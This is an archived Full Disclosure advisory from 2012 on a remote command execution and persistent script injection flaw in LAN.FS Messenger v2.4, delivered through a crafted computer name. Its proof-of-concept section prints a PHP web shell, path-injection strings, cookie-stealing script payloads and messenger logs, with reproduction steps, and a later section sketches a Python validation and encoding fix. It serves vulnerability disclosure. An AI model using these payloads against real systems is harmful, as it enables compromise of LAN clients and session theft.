Full Disclosure mailing list archives

LAN.FS Messenger Software v2.4 - Command Execution Vulnerability
From: Vulnerability Lab <research () vulnerability-lab com>
Date: Tue, 20 Nov 2012 04:13:30 +0100

Title:
======
LAN.FS Messenger v2.4 - Command Execution Vulnerability


Date:
=====
2012-11-14


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=760


VL-ID:
=====
760


Common Vulnerability Scoring System:
====================================
8.2


Introduction:
=============
Lan.FS is a very quick, small and compact freeware networktool (for non-commercial use only) for 
Windows 2000/XP/2003/Vista & Windows 7. It is easy to handle for beginners and provides various 
functions for experts, too. Some features are:

    Messenger with animated emoticons
    Filetransfer service with statusdisplay
    Remote Desktop functions to telecommand other computers in your network
    Remote Shell function for access to the systemprompt of other computers in your network.
    Access to the whole filesystem of other computers
    Windows commands (reboot, shutdown, user switch, run) on other computers

These functions are provided in your Local Area Network. Innovative aspects concerning networkprograms are:

    Lan.FS is ready for operation directly after finishing installation.
    You do not need specialised knowledge about networks and networkadministration
    Lan.FS does not feature needless functions: You decide what to do.
    Lan.FS works Windows-Workinggroups independent
    Lan.FS works in WLAN networks (even if they are not absolutely stable)
    Lan.FS provides a substantial support and trouble shooting
    Lan.FS is Vista capable

(Copy of the Vendor Homepage: http://www.lan-fs.de/ )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a command execution vulnerability in the official LAN.FS v2.4 
Messenger Software.


Report-Timeline:
================
2012-11-12:     Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
A command execution vulnerability is detected in the official LAN.FS v2.4 Messenger Software. The
vulnerability allows a remote attacker, without user interaction, to execute system-specific code to
compromise the connected client system in the LAN. The command execution vulnerability is located in
the Netzwerkeinstellungen - Administration (Computer editieren, add & co.) > Computersettings
(Computereinstellungen) module, in the vulnerable Computername software input field. Remote attackers
can change their own computer name to execute malicious system commands or script code attacks against
the connected client via the Messenger Service (Nachrichtendienst). The Windows path system
commands/requests or the injected malicious script code are executed directly out of the
Nachrichtendienst web context. Successful exploitation of the vulnerability results in system
compromise via command injection/execution, persistent script code injection, persistent software
context manipulation, external malware loads or malicious external redirects. Exploitation of the
vulnerability requires a connected conversation but no direct user interaction. The commands or script
code are executed when the arriving message is processed.

Vulnerable Software Section(s):
                                        [+] Local Area Network - Computer Details

Vulnerable Software Module(s):
                                        [+] Computersettings

Vulnerable Software Parameter(s):
                                        [+] Computername

Affected Software Module(s):
                                        [+] Nachrichtendienst (Messenger Service)


Proof of Concept:
=================
The software validation vulnerability can be exploited by remote attackers without required user
interaction or an application user account.
For demonstration or reproduce ...


PoC: Command Execution or Injection (Path, Files & CMD)
%20../'+C:\ProgramData\Lan.FS\
%20../'+C:\ProgramData\Lan.FS\Profile\
%20../'+C:\Program Files (x86)\Lan.FS

<HTML><BODY>
<FORM METHOD="GET" NAME="Message" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>


Review: Command Execution - Messenger (Windows7) Logs
<html><body style="background-image:url(%20../'+C:\ProgramData\Lan.FS\Profile\);
<html><body style="background-image:url(%20../'+C:\ProgramData\Lan.FS\Profile\);
<html><body style="background-image:url(%20../'+C:\Program Files (x86)\Lan.FS);



PoC: Script Code Inject
“<iframe src=http://vuln-lab.com>>
"><iframe src=vuln-lab.com onload=alert("VL") <>
"<script>alert(document.cookie)</script><div style="1


Review: Script Code Inject - Messenger (Windows7) Logs

<html><body 
style="background-image:url(C:\ProgramData\Lan.FS\Profile\Emoticons\background.bmp);background-repeat:no-repeat; 
background-attachment:fixed;  background-position:bottom right;"></body></html><div style="font-family: Verdana; 
font-size: 10px; 
color: #0000ff"><b>>“<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!]> (20:35:38):</b></div><div 
style="font-family: Verdana; 
font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: Verdana; font-size: 10px; 
color: #ff0000"><b>>“<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!]> (20:35:46):</b></div><div 
style="font-family: 
Verdana; font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: 
Verdana; font-size: 10px; color: #0000ff"><b>>"<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!]><div 
style="1 
"<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!])</script>
<div style="1 (20:36:27):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: 
Verdana; font-size: 10px; color: #ff0000"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script>
<div style="1 (20:36:29):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: 
Verdana; font-size: 10px; color: #0000ff"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script>
<div style="1 (20:36:33):</b></div><div style="font-family: Verdana; font-size: 10px; color: 
#000000">>"<script>alert(document.cookie)</script>
<div style="1<br></div><div style="font-family: Verdana; font-size: 10px; color: 
#ff0000"><b>>"<script>alert(document.cookie)
</script><div style="1 >"<script>alert(document.cookie)</script><div style="1 (20:36:34):</b></div><div 
style="font-family: Verdana; font-size: 
10px; color: #000000">>"<script>alert(document.cookie)</script><div style="1<br></div><div style="font-family: Verdana; 
font-size: 10px; color: #0000ff"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script><div style="1 
(20:36:41):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">yea<br></div><div 
style="font-family: Verdana; font-size: 
10px; color: #ff0000"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script>
<div style="1 (20:36:42):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">yea<br></div><div 
style="font-family: 
Verdana; font-size: 10px; color: #0000ff"><b>>"<script>alert(document.cookie)</script><div style="1 
"<script>alert(document.cookie)</script>
<div style="1 
(20:36:49):</b></div><div style="font-family: Verdana; font-size: 10px; color: #000000">tha boss :D<br></div>
<div style="font-family: Verdana; font-size: 10px; color: #ff0000"><b>>"<script>alert(document.cookie)</script><div 
style="1
"<script>alert(document.cookie)</script><div style="1 (20:36:50):</b></div><div style="font-family: Verdana; 
font-size: 10px; 
color: #000000">tha boss :D<br></div>


Manually reproduce ...
1. Install the software LAN.FS 2.4.x and start LAN.FS 2.4.x
2. First, go to the system settings of the Windows 7 system and change the computername/hostname to a
   malicious system path command or malicious script code. Save!
3. Change the hostname in Netzwerkeinstellungen > Administration > Computersettings to your own values
   with the system path command or script code (see step 2). Save!
4. Update the settings & connect the Nachrichtendienst to your target system
5. Send a random message to the victim via the lan.fs messenger
6. The vulnerable hostname in the message header can execute local file requests, execute files and
   path commands, or execute persistent malicious script code
7. The command or script code is executed when the messenger processes the attacker's arrived message
   for display. No user interaction required!


Solution:
=========
The vulnerability can be patched by parsing the hostname (computername) input field.
The hostname web context in the messenger software listing should also be parsed.
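
The two fixes named above (validate the computername on input, encode it where the messenger writes
it into its HTML message listing), sketched as an added example that is not code from LAN.FS or from
the advisory's authors. The header template is modeled on the log excerpt above, and the 15-character
allowlist and all function names are assumptions of this example.

```python
import html
import re

# Assumed allowlist for a computer name: 1-15 characters, letters, digits and
# hyphen, not starting or ending with a hyphen (NetBIOS-style length limit).
_NAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,13}[A-Za-z0-9])?")

# Message header markup modeled on the messenger log shown in the advisory.
HEADER_TMPL = ('<div style="font-family: Verdana; font-size: 10px; '
               'color: #0000ff"><b>{name} ({time}):</b></div>')


def is_valid_computername(name: str) -> bool:
    """Input-side check: accept only names that match the allowlist."""
    return _NAME_RE.fullmatch(name) is not None


def render_header_unsafe(name: str, time: str) -> str:
    """Behaviour the logs show: the peer-supplied name lands in markup as-is."""
    return HEADER_TMPL.format(name=name, time=time)


def render_header_safe(name: str, time: str) -> str:
    """Output-side fix: HTML-encode the peer's name and flag invalid ones."""
    shown = html.escape(name, quote=True)
    if not is_valid_computername(name):
        shown = "[invalid name] " + shown
    return HEADER_TMPL.format(name=shown, time=html.escape(time, quote=True))


# Constructed sample inputs: an ordinary name and one string taken from the
# advisory's "Script Code Inject" list.
SAMPLES = ["WORKSTATION-07",
           '"<script>alert(document.cookie)</script><div style="1']

if __name__ == "__main__":
    for peer in SAMPLES:
        print("valid:", is_valid_computername(peer))
        print("unsafe:", render_header_unsafe(peer, "20:35:38"))
        print("safe:  ", render_header_safe(peer, "20:35:38"))
```

The encoding step has to run on the receiving side as well, because the name arrives from a peer whose
own input validation cannot be trusted.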


Risk:
=====
The security risk of the remote command execution vulnerability is estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team]  - Benjamin Kunz Mejri (bkm () vulnerability-lab com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab
disclaims all warranties, either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of business profits or special
damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody
to break any vendor licenses, policies, deface websites, hack into databases or trade with
fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.vulnerability-lab.com/register
Contact:    admin () vulnerability-lab com      - support () vulnerability-lab com             - research () vulnerability-lab com
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com                  - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization
from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab
Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers.
To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or
support () vulnerability-lab com) to get a permission.

                                        Copyright © 2012 | Vulnerability Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research () vulnerability-lab com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
